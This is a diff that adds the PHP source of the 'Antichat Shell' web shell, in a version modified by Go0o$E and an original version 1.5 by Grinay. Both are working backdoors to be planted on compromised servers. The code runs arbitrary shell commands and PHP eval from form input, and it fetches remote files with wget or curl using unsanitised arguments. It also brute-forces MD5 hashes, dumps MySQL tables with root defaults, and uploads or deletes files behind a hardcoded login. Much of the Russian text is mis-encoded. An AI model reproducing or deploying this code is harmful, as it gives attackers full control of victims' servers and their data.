+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"execute\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<table><form method=POST enctype=multipart/form-data>
+  <tr><td><input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Upload to dir: <input type=text name=dirupload value=\"".$dirupload."\" size=50><tr><td>New file name: <input type=text name=filename></td></tr><tr><td><input type=file name=file> <input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//Brute
+if($action=="brute"){
+
+function Brute() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+ignore_user_abort(1);
+}
+if($chars_de==""){$chars_de="";}
+$content="<table><form action='$php_self' method=post name=md5><tr><td><b>Decrypte MD5</b>
+<tr><td>&nbsp;MD5 õåø:<b>".$pass_de."</b></td>
+<input type='hidden' name='action' value='$action'>
+<tr><td>&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+<td><b>Ïåðåáîð áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
+<a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a><br>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Ñèìâîëû]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
+<br></br><input type=reset value=Î÷èñòèòü class=button1></td></tr>
+<tr><td>&nbsp;<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''>
+</td><td><input type='submit' value='Decrypt MD5' class=button1></td></tr></form>
+<script>
+function ins(text){
+document.md5.chars_de.value+=text;
+document.md5.chars_de.focus();}
+</script>";
+
+if($_POST[pass_de]){  
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+}
+{
+crack_md5();
+}
+}
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+
+
+
+echo "<STYLE>BODY{background-color: #2b2f34;color: #9acd32;</STYLE><table><tr><td>Ðåçóëüòàò âûïîëíåíèÿ ïåðåáîðà ïàðîëåé:</td></tr>
+<tr><td>Çàõåøèðîâàííûé ïàðîëü:</b></td><td><font color=red>&nbsp;&nbsp;$word</font></td></tr>
+<tr><td>Íà÷àëî ïåðåáîðà:</td><td>&nbsp;&nbsp;$dat - $date</td></tr>
+<tr><td>Îêîí÷àíèå ïåðåáîðà:</td><td>&nbsp;&nbsp;$dat2 - $date2</td></tr>
+<tr><td>Âûïîëíåíèå ïåðåáîðà õåøåé çàïèñàí â ôàéë:  ".$word."_md5</td></tr></table>";
+
+
+
+$f=@fopen($word._md5,"a+");
+fputs($f,"Õýø èç MD5 [$pass_de] = $word 
+Íà÷àëî ïåðåáîðà:\t$dat - $date 
+Îêîí÷àíèå ïåðåáîðà:\t$dat2 - $date2");
+exit;
+}}
+
+//Mysql
+
+if($action=="mysql"){
+if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     $content.="<center><b>Ãîòîâî! Äàìï ïðîøåë óäà÷íî!</b></center>";
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+    else $content.="<center><b>Òàêîé ÁÄ íåò!</b></center>";
+   @mysql_close($db);
+   } 
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { $content.="<center><b>ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!</b></center>"; }
+
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+&nbsp;Áàçà: <input type=text name=mysql_db size=15 value=";
+$content.=(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+$content.=">&nbsp;Òàáëèöà: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+$content.=(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+$content.=">&nbsp;Ëîãèí: &nbsp;<input type=text name=mysql_l size=15 value=";
+$content.=(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+$content.=">&nbsp;Ïàðîëü: &nbsp;<input type=text name=mysql_p size=15 value=";
+$content.=(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+$content.="><input type=hidden name=dir size=85 value=".$dir.">
+<input type=hidden name=cmd size=85 value=mysql_dump>
+<br>&nbsp;Ñîõðàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=80 value=";
+$content.=(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+$content.="><input type=submit name=submit value=Ñîõðàíèòü></form>"; 
+
+@$php_self=$_POST['PHP_SELF'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+if(!@$conn){
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<table><tr><td valign=top>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>Õîñò: &nbsp;&nbsp;&nbsp;&nbsp;<input name=adress value='$adress' size=20>
+<tr><td valign=top>Ïîðò: &nbsp;&nbsp;&nbsp;&nbsp;<input name=port value='$port' size=20>
+<tr><td valign=top>Ëîãèí: &nbsp;&nbsp;<input name=login value='$login' size=20>
+<tr><td valign=top>Ïàðîëü: <input name=pass value='$pass' size=20>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Ïîäêëþ÷èòüñÿ></form></td></tr>
+</table>";
+}
+@$conn=$_POST['conn'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("ÎØÈÁÊÀ: ".mysql_error());
+if($serv){
+$content.="<form name='conn' action='$php_self' method='post'><input type=hidden name=conn value=0>
+<input type='hidden' name='action' value='$action'>
+Ñòàòóñ: Ïîäêëþ÷åí : <input type=submit name=exit value='Âûéòè èç áàçû'></form>
+<table><tr><td><font color=red>[Òàáëèöû]<br></br>";
+}
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+$content.= "<table><a href=\"#\" onclick=\"document.dump1.db.value='$str[0]';document.dump1.tbl.value='$str[0]';document.dump1.submit();\">$str[0]</a></table>";
+@$tc++;
+}
+$content.="<form name='dump1' action='$php_self' method='POST'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=base value='1' type=hidden>
+<input name=db value='$str[0]' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=conn value='1' type=hidden>
+<input name=tbl value='$str[0]' type=hidden></form>";
+
+@$base=$_POST['base'];
+@$db=$_POST['db'];
+$content.="<br></br><font color=red>[Âñåãî òàáëèö: $tc]";
+if($base){
+$content.="<br></br><font color=red>Òàáëèöà: [$tbl]<br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+$content.="<table><font color=red>[$records[0]]</font><a href=\"#\" onclick=\"document.dump2.vn.value='$str[0]';document.dump2.tbl.value='$str[0]';document.dump2.submit();\">$str[0]</a></table>";
+
+mysql_free_result($c);
+}}
+$content.="<form name='dump2' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<input name=inside value='1' type=hidden>
+<input name=base value='1' type=hidden>
+<input name=vn value='$str[0]' type=hidden>
+<input name=db value='$db' type=hidden>
+<input name=p value='sql' type=hidden>
+<input name=adress value='$adress' type=hidden>
+<input name=port value='$port' type=hidden>
+<input name=login value='$login' type=hidden>
+<input name=pass value='$pass' type=hidden>
+<input name=tbl value='$str[0]' type=hidden>
+<input name=conn value='1' type=hidden></form>";
+
+@$vn=$_POST['vn'];
+$content.= "<td valign=top>Áàçà äàííûõ: $db => $vn<br>";  
+@$inside=$_POST['inside'];
+@$tbl=$_POST['tbl'];
+if($inside){
+$content.= "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+$content.= "Âñåãî: $cfa[0]<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+Îò: <input name=from size=3 value=0>
+Äî: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value='Çàãðóçèòü'>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+</form>";
+@$vn=$_POST['vn'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$content.="<td>&nbsp;</td><td bgcolor=#44474f><font color=red> $name </font></td> ";
+}
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+$content.= "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+$content.= "<td>&nbsp;</td><td bgcolor=#44474f>$nst_inside</td>\r\n";
+} 
+}
+mysql_free_result($result);
+$content.= "</table>";
+}}}
+
+//end function
+
+?><?=$header;?><table width="100%" bgcolor="#31333b"  align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Shell |. </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Viewer |.</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Editor |.</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Upload |.</a></td><td><a href="#" onclick="document.reqs.action.value='brute';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Brute |.</a></td><td><a href="#" onclick="document.reqs.action.value='mysql';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Mysql Dumper|.</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Php Eval |.</a></td><td><a href="#" onclick="history.back();">.| <-back |.</a></td><td><a href="#" onclick="history.forward();">.| forward->|.</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1> <tr><td>Safe mode: <?php echo $safe_mode;?><br>Disable functions: <?php echo $disfunc;?><br>OS: <?php echo @php_uname();?><br>Server: <?php echo @getenv("SERVER_SOFTWARE")?><br>Id: <?php echo "Uid=".getmyuid(). " Gid=".getmygid(); ?><br><? echo 'Server: '.@gethostbyname($_SERVER["HTTP_HOST"]).' You: '.$_SERVER['REMOTE_ADDR'].' XFF: '.@gethostbyaddr($HTTP_X_FORWARDED_FOR).' ';?></br> Status: <?php echo @$stdata;?></td></tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?>
+<br></table><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#44474f BORDER=1 width=100% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=#44474f><tr><td><center><font color='#9acd32' face='Tahoma' size = 2><b>| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by Go0o$E |</b></font></center></td></tr></table><?=$footer;?>

php/Antichat Shell.php

@@ -0,0 +1,366 @@
+<?php
+session_start();
+error_reporting(0);
+set_time_limit(9999999);
+$login='antichat';
+$password='antichat';
+$auth=1;
+$version='version 1.5 by Grinay';
+$msgnotice='';
+$style='<STYLE>
+BODY{
+  background-color: #2B2F34;
+  color: #C1C1C7;
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  MARGIN-TOP: 0px;
+  MARGIN-BOTTOM: 0px;
+  MARGIN-LEFT: 0px;
+  MARGIN-RIGHT: 0px;
+  margin:0;
+  padding:0;
+  scrollbar-face-color: #336600;
+  scrollbar-shadow-color: #333333;
+  scrollbar-highlight-color: #333333;
+  scrollbar-3dlight-color: #333333;
+  scrollbar-darkshadow-color: #333333;
+  scrollbar-track-color: #333333;
+  scrollbar-arrow-color: #333333;
+}
+input{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+select{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+textarea{
+  background-color: #333333;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+a:link{
+  
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:visited{
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:hover, a:active{
+  width: 100%;
+  background-color: #A8A8AD;
+  
+
+  color: #E7E7EB;
+  text-decoration: none;
+  font-size: 8pt;
+}
+td, th, p, li{
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  border-color:black;
+}
+</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+//error parser
+$filext="File already exists.";
+$uploadok="File was successfully uploaded.";
+$dircrt="Dir is created.";
+$dircrterr="Don't create dir.";
+$dirnf="Dir not found.";
+$empty="Directory not empty or access denide.";
+$deletefileok="File deleted";
+$deletedirok="Dir deleted";
+//end error parser
+
+//auth
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+if(@$_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+//end auth
+
+function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
+
+
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+
+$dir=chdir($dir);
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+
+
+
+
+
+//crdir
+
+
+if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+  
+//Current type OS
+if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
+
+
+
+ 
+ 
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $msgnotice.=$deletefileok;
+}
+//end delete
+
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
+
+}
+//end delete
+?>
+
+<? echo $header;?> 
+<!--content-->
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
+<td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+<td><a href="#" onclick="history.back();"> <-back |</a></td>
+<td><a href="#" onclick="history.forward();"> forward->|</a></td>
+
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+<!--end one content-->
+<?php if(@$msgnotice!="") echo $msgnotice;?>
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
